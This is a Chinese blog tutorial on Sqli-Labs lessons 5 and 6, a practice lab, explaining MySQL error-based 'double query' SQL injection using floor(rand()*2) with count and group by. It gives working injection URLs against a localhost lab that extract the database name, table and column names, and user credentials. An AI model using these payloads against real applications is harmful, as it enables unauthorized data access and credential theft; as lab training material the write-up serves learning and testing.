Sqli-Labs:Less5-Less6

Less5

双注入_GET_单引号_字符型注入

我们来看什么是双查询注入

0x01. 子查询

先理解一下子查询,查询的关键字是select。子查询可以简单的理解在一个select语句里还有一个select,里面的这个select语句就是子查询,子查询要用单引号闭合。

select concat((select database()))

concat()函数在Less1里详细介绍过,这条语句的执行结果是:

真正执行的时候,先从子查询进行。因此执行select database()这个语句就会把当前的数据库查出来,然后把结果传入到concat函数。

0x02. Mysql语法

rand()函数

随机函数:返回0~1间的小数。

floor()函数

小数向下取整函数。向上取整函数:ceiling()

count()函数

汇总函数:返回匹配指定条件的行数。

select count(*) from users

group by子句

分组语句:常用于结合合计函数,根据一个或多个列对结果集进行分组。
如有这样一个表:

customer price
alice 2300
charlie 4000
alice 700
bob 1600
bob 400

select customer,sum(price) from orders group by customer

得到的结果就是:

customer price
alice 3000
charlie 4000
bob 2000

如果没加group by,结果就有了重复项:

customer price
alice 3000
charlie 4000
alice 3000
bob 2000
bob 2000

0x03. 双查询注入原理

当在一个聚合函数,比如count()函数后面如果使用分组语句就会把查询的一部分以错误的形式显示出来。
步骤1:rand()函数返回0~1间的数,*2向下取整后非0即1:

select floor(rand()*2)


步骤2:子查询返回的结果用concat_ws()函数连接,可以看到显示的值中有数据库名,数据库名之后连接的非0即1:

select concat_ws('-',(select database()),floor(rand()*2))


步骤3:如果在这条语句后面加上from一个表名,那么会返回security-0security-1的一个集合,数目是由表本身有几条结果决定的:

select concat_ws('-',(select database()),floor(rand()*2)) from users


如果是从information_schema.schemata里,这个表包含了mysql的所有数据库名,则会返回数据库数个结果。

步骤4:我们使用information_schema.tables或者information_schema.columns两个表来查询想要的信息。
我们把concat_ws('-',(select database()),floor(rand()*2))这个结果取了一个别名a,然后使用它进行分组。这样相同的security-0分到一组,security-1分到一组,就剩下两个结果了:

select concat_ws('-',(select database()),floor(rand()*2))as a from information_schema.tables group by a


这里的database()可以替换成任何想查的函数,比如version()user()等。

步骤5:最后一步,使报错中显示想要查询的结果:

select count(*),concat_ws('-',(select database()),floor(rand()*2))as a from information_schema.tables group by a


可以看到报错中显示了数据库名。

注意:还有一种双注入比较复杂,叫做派生表。需要使用select 1 from (table_name) derived_table_name这样的语法来报错,具体就是:

select 1 from (select count(*),concat_ws('-',(select user()),floor(rand()*2))as a from information_schema.tables group by a) b

0x04. 注入过程

http://localhost:8088/sqlilabs/Less-5/?id=1
http://localhost:8088/sqlilabs/Less-5/?id=1'
http://localhost:8088/sqlilabs/Less-5/?id=1"

第一、第三条正常,且无回显;第二条报错:字符型双注入。

http://localhost:8088/sqlilabs/Less-5/?id=-1' order by 4--+

得出共3个字段。

http://localhost:8088/sqlilabs/Less-5/?id=-1' union select 1,2,3--+

无回显,即不需要看到哪几个字段显示。

http://localhost:8088/sqlilabs/Less-5/?id=-1' union select 1,count(*),concat_ws('-',(select database()),floor(rand()*2)) as a from information_schema.tables group by a--+

通过联合查询,得出数据库名:security

http://localhost:8088/sqlilabs/Less-5/?id=-1' union select 1,count(*),concat_ws('-',(select group_concat(table_name) from information_schema.tables where table_schema='security'),floor(rand()*2)) as a from information_schema.tables group by a--+

通过group_concat()函数将查到的表名连接并返回报错,得出表名:users

http://localhost:8088/sqlilabs/Less-5/?id=-1' union select 1,count(*),concat_ws('-',(select group_concat(column_name) from information_schema.columns where table_name='users'),floor(rand()*2)) as a from information_schema.tables group by a--+

同样的方法,得出字段名:id、username、password

http://localhost:8088/sqlilabs/Less-5/?id=-1' union select 1,count(*),concat_ws('-',(select concat_ws('-',id,username,password) from users limit 0,1),floor(rand()*2)) as a from information_schema.columns group by a--+

最后是用户信息,因为这里只能查询一行,所以不能用group_concat(),可以修改limit的范围来遍历用户信息。

0x05. 吐槽

没有吐槽
注入真有意思
url一点都不长

Less6

双注入_GET_双引号_字符型注入

和Less5差别只在于单双引号,可用上述手注或脚本注入。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 213,711评论 6 493
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 91,079评论 3 387
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 159,194评论 0 349
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 57,089评论 1 286
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 66,197评论 6 385
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,306评论 1 292
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,338评论 3 412
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,119评论 0 269
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,541评论 1 306
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,846评论 2 328
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,014评论 1 341
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,694评论 4 337
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,322评论 3 318
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,026评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,257评论 1 267
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,863评论 2 365
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,895评论 2 351

推荐阅读更多精彩内容